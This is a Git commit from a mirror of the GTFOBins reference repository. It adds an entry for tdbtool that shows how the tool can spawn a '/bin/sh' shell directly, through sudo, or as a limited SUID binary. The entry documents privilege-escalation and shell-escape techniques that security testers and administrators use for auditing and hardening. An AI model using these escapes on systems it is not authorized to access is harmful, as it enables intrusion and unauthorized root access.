1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add tdbtool

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Rob Fuller 2023-02-23 15:01:22 -05:00 committed by GitHub
parent d1d30414fe
commit abbed40f74
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

15
_gtfobins/tdbtool.md Normal file
View File

@ -0,0 +1,15 @@
---
functions:
shell:
- code: |
tdbtool
! /bin/sh
sudo:
- code: |
sudo tdbtool
! /bin/sh
limited-suid:
- code: |
./tdbtool
! /bin/sh
---